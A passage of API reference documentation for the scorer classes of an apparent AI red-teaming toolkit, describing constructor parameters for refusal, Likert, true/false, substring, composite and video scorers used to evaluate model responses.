ParameterTypeDescription
message_pieceMessagePieceThe message piece to check.

Returns:

validate

validate(message: Message, objective: str | None) → None

Validate a message and objective against configured requirements.

ParameterTypeDescription
messageMessageThe message to validate.
objective`strNone`

Raises:

SelfAskCategoryScorer

Bases: TrueFalseScorer

A class that represents a self-ask score for text classification and scoring. Given a classifier file, it scores according to these categories and returns the category the MessagePiece fits best.

There is also a false category that is used if the MessagePiece does not fit any of the categories.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target to interact with.
content_classifier_pathUnion[str, Path]The path to the classifier YAML file.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.

SelfAskGeneralFloatScaleScorer

Bases: FloatScaleScorer

A general-purpose self-ask float-scale scorer that uses a chat target and a configurable system prompt and prompt format. The final score is normalized to [0, 1].

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target used to score.
system_prompt_format_stringstrSystem prompt template with placeholders for objective, prompt, and message_piece.
prompt_format_stringOptional[str]User prompt template with the same placeholders. Defaults to None.
categoryOptional[str]Category for the score. Defaults to None.
min_valueintMinimum of the model’s native scale. Defaults to 0. Defaults to 0.
max_valueintMaximum of the model’s native scale. Defaults to 100. Defaults to 100.
validatorOptional[ScorerPromptValidator]Custom validator. If omitted, a default validator will be used requiring text input and an objective. Defaults to None.
score_value_output_keystrJSON key for the score value. Defaults to “score_value”. Defaults to 'score_value'.
rationale_output_keystrJSON key for the rationale. Defaults to “rationale”. Defaults to 'rationale'.
description_output_keystrJSON key for the description. Defaults to “description”. Defaults to 'description'.
metadata_output_keystrJSON key for the metadata. Defaults to “metadata”. Defaults to 'metadata'.
category_output_keystrJSON key for the category. Defaults to “category”. Defaults to 'category'.

SelfAskGeneralTrueFalseScorer

Bases: TrueFalseScorer

A general-purpose self-ask True/False scorer that uses a chat target and a configurable system prompt and prompt format.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target used to score.
system_prompt_format_stringstrSystem prompt template with placeholders for objective, task (alias of objective), prompt, and message_piece.
prompt_format_stringOptional[str]User prompt template with the same placeholders. Defaults to None.
categoryOptional[str]Category for the score. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator. If omitted, a default validator will be used requiring text input and an objective. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncAggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.
score_value_output_keystrJSON key for the score value. Defaults to “score_value”. Defaults to 'score_value'.
rationale_output_keystrJSON key for the rationale. Defaults to “rationale”. Defaults to 'rationale'.
description_output_keystrJSON key for the description. Defaults to “description”. Defaults to 'description'.
metadata_output_keystrJSON key for the metadata. Defaults to “metadata”. Defaults to 'metadata'.
category_output_keystrJSON key for the category. Defaults to “category”. Defaults to 'category'.

SelfAskLikertScorer

Bases: FloatScaleScorer

A class that represents a “self-ask” score for text scoring based on a Likert scale. A Likert scale consists of ranked, ordered categories and is often on a 5 or 7 point basis, but you can configure a scale with any set of non-negative integer score values and descriptions by providing a custom YAML file.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target to use for scoring.
likert_scaleLikertScalePathsThe Likert scale configuration to use for scoring.
validatorOptional[ScorerPromptValidator]Custom validator for the scorer. Defaults to None. Defaults to None.

SelfAskQuestionAnswerScorer

Bases: SelfAskTrueFalseScorer

A class that represents a self-ask question answering scorer.

Usually, QuestionAnswerScorer should be used, but this can be useful for when choices are not sent to objective target or you need more flexibility in determining if the questions were answered correctly.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target to use for the scorer.
true_false_question_pathOptional[pathlib.Path]The path to the true/false question file. Defaults to None, which uses the default question_answering.yaml file. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

SelfAskRefusalScorer

Bases: TrueFalseScorer

A self-ask scorer that detects refusal in AI responses.

This scorer uses a language model to determine whether a response contains a refusal to answer or comply with the given prompt. It’s useful for evaluating whether AI systems are appropriately refusing harmful requests.

The scorer supports two modes via RefusalScorerPaths:

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe endpoint that will be used to score the prompt.
refusal_system_prompt_pathUnion[RefusalScorerPaths, Path, str]The path to the system prompt to use for refusal detection. Can be a RefusalScorerPaths enum value, a Path, or a string path. Defaults to RefusalScorerPaths.DEFAULT. Defaults to RefusalScorerPaths.DEFAULT.
prompt_format_stringOptional[str]The format string for the prompt with placeholders. Use {objective} for the conversation objective and {response} for the response to evaluate. Defaults to “conversation_objective: {objective}\nresponse_to_evaluate_input: {response}”. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

SelfAskScaleScorer

Bases: FloatScaleScorer

A class that represents a “self-ask” score for text scoring for a customizable numeric scale.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target to use for scoring.
scale_arguments_pathOptional[Union[Path, str]]Path to the YAML file containing scale definitions. Defaults to TREE_OF_ATTACKS_SCALE if not provided. Defaults to None.
system_prompt_pathOptional[Union[Path, str]]Path to the YAML file containing the system prompt. Defaults to GENERAL_SYSTEM_PROMPT if not provided. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator for the scorer. Defaults to None. Defaults to None.

SelfAskTrueFalseScorer

Bases: TrueFalseScorer

A class that represents a self-ask true/false for scoring.

Given written descriptions of “true” and “false” (passed as a file or a TrueFalseQuestion), it returns the value that matches either description most closely.

If no descriptions are provided, it defaults to the TASK_ACHIEVED scorer.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe chat target to interact with.
true_false_question_pathOptional[Union[str, Path]]The path to the true/false question file. Defaults to None.
true_false_questionOptional[TrueFalseQuestion]The true/false question object. Defaults to None.
true_false_system_prompt_pathOptional[Union[str, Path]]The path to the system prompt file. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

SubStringScorer

Bases: TrueFalseScorer

Scorer that checks if a given substring is present in the text.

This scorer performs substring matching using a configurable text matching strategy. Supports both exact substring matching and approximate matching.

Constructor Parameters:

ParameterTypeDescription
substringstrThe substring to search for in the text.
text_matcherOptional[TextMatching]The text matching strategy to use. Defaults to ExactTextMatching with case_sensitive=False. Defaults to None.
categoriesOptional[list[str]]Optional list of categories for the score. Defaults to None. Defaults to None.
aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.

TrueFalseAggregatorFunc

TrueFalseCompositeScorer

Bases: TrueFalseScorer

Composite true/false scorer that aggregates results from other true/false scorers.

This scorer invokes a collection of constituent TrueFalseScorer instances and reduces their single-score outputs into one final true/false score using the supplied aggregation function (e.g., TrueFalseScoreAggregator.AND, TrueFalseScoreAggregator.OR, TrueFalseScoreAggregator.MAJORITY).

Constructor Parameters:

ParameterTypeDescription
aggregatorTrueFalseAggregatorFuncAggregation function to combine child scores (e.g., TrueFalseScoreAggregator.AND, TrueFalseScoreAggregator.OR, TrueFalseScoreAggregator.MAJORITY).
scorersList[TrueFalseScorer]The constituent true/false scorers to invoke.

TrueFalseInverterScorer

Bases: TrueFalseScorer

A scorer that inverts a true false score.

Constructor Parameters:

ParameterTypeDescription
scorerTrueFalseScorerThe underlying true/false scorer whose results will be inverted.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Note: This parameter is present for signature compatibility but is not used. Defaults to None.

TrueFalseQuestion

A class that represents a true/false question.

This is sent to an LLM and can be used as an alternative to a yaml file from TrueFalseQuestionPaths.

Constructor Parameters:

ParameterTypeDescription
true_descriptionstrDescription of what constitutes a “true” response.
false_descriptionstrDescription of what constitutes a “false” response. Defaults to a generic description if not provided. Defaults to ''.
categorystrThe category of the question. Defaults to an empty string. Defaults to ''.
metadatastrAdditional metadata for context. Defaults to an empty string. Defaults to ''.

TrueFalseQuestionPaths

Bases: enum.Enum

Paths to true/false question YAML files.

TrueFalseScoreAggregator

Namespace for true/false score aggregators that return a single aggregated score.

All aggregators return a list containing one ScoreAggregatorResult that combines all input scores together, preserving all categories.

TrueFalseScorer

Bases: Scorer

Base class for scorers that return true/false binary scores.

This scorer evaluates prompt responses and returns a single boolean score indicating whether the response meets a specific criterion. Multiple pieces in a request response are aggregated using a TrueFalseAggregatorFunc function (default: TrueFalseScoreAggregator.OR).

Constructor Parameters:

ParameterTypeDescription
validatorScorerPromptValidatorCustom validator.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

Methods:

get_scorer_metrics

get_scorer_metrics() → Optional[ObjectiveScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate the scores returned by the scorer.

ParameterTypeDescription
scoreslist[Score]The scores to be validated.

Raises:

VideoFloatScaleScorer

Bases: FloatScaleScorer, _BaseVideoScorer

A scorer that processes videos by extracting frames and scoring them using a float scale image scorer.

The VideoFloatScaleScorer breaks down a video into frames and uses a float scale scoring mechanism. Frame scores are aggregated using a FloatScaleAggregatorFunc.

By default, uses FloatScaleScorerByCategory.MAX which groups scores by category (useful for scorers like AzureContentFilterScorer that return multiple scores per frame). This returns one aggregated score per category (e.g., one for “Hate”, one for “Violence”, etc.).

For scorers that return a single score per frame, or to combine all categories together, use FloatScaleScoreAggregator.MAX, FloatScaleScorerAllCategories.MAX, etc.

Optionally, an audio_scorer can be provided to also score the video’s audio track. When provided, the audio is extracted, transcribed, and scored. The audio scores are included in the aggregation.

Constructor Parameters:

ParameterTypeDescription
image_capable_scorerFloatScaleScorerA FloatScaleScorer capable of processing images.
audio_scorerOptional[FloatScaleScorer]Optional FloatScaleScorer for scoring the video’s audio track. When provided, audio is extracted from the video, transcribed to text, and scored. The audio scores are aggregated with frame scores. Defaults to None.
num_sampled_framesOptional[int]Number of frames to extract from the video for scoring (default: 5). Defaults to None.
validatorOptional[ScorerPromptValidator]Validator for the scorer. Defaults to video_path data type validator. Defaults to None.
score_aggregatorFloatScaleAggregatorFuncAggregator for combining frame scores. Defaults to FloatScaleScorerByCategory.MAX. Use FloatScaleScorerByCategory.MAX/AVERAGE/MIN for scorers that return multiple scores per frame (groups by category and returns one score per category). Use FloatScaleScorerAllCategories.MAX/AVERAGE/MIN to combine all scores regardless of category (returns single score with all categories combined). Use FloatScaleScoreAggregator.MAX/AVERAGE/MIN for simple aggregation preserving all categories (returns single score with all categories preserved). Defaults to FloatScaleScorerByCategory.MAX.
image_objective_templateOptional[str]Template for formatting the objective when scoring image frames. Use {objective} as placeholder for the actual objective. Set to None to not pass objective to image scorer. Defaults to a template that provides context about the video frame. Defaults to _BaseVideoScorer._DEFAULT_IMAGE_OBJECTIVE_TEMPLATE.
audio_objective_templateOptional[str]Template for formatting the objective when scoring audio. Use {objective} as placeholder for the actual objective. Set to None to not pass objective to audio scorer. Defaults to None because video objectives typically describe visual content that doesn’t apply to audio. Defaults to None.

VideoTrueFalseScorer

Bases: TrueFalseScorer, _BaseVideoScorer

A scorer that processes videos by extracting frames and scoring them using a true/false image scorer.

Aggregation Logic (hard-coded): - Frame scores are aggregated using OR: if ANY frame meets the objective, the visual score is True. - When audio_scorer is provided, the final score uses AND: BOTH visual (frames) AND audio must be True for the overall video score to be True.

Constructor Parameters:

ParameterTypeDescription
image_capable_scorerTrueFalseScorerA TrueFalseScorer capable of processing images.
audio_scorerOptional[TrueFalseScorer]Optional TrueFalseScorer for scoring the video’s audio track. When provided, audio is extracted from the video and scored. The final score requires BOTH video frames AND audio to be True. Defaults to None.
num_sampled_framesOptional[int]Number of frames to extract from the video for scoring (default: 5). Defaults to None.
validatorOptional[ScorerPromptValidator]Validator for the scorer. Defaults to video_path data type validator. Defaults to None.
image_objective_templateOptional[str]Template for formatting the objective when scoring image frames. Use {objective} as placeholder for the actual objective. Set to None to not pass objective to image scorer. Defaults to a template that provides context about the video frame. Defaults to _BaseVideoScorer._DEFAULT_IMAGE_OBJECTIVE_TEMPLATE.
audio_objective_templateOptional[str]Template for formatting the objective when scoring audio. Use {objective} as placeholder for the actual objective. Set to None to not pass objective to audio scorer. Defaults to None because video objectives typically describe visual content that doesn’t apply to audio. Defaults to None.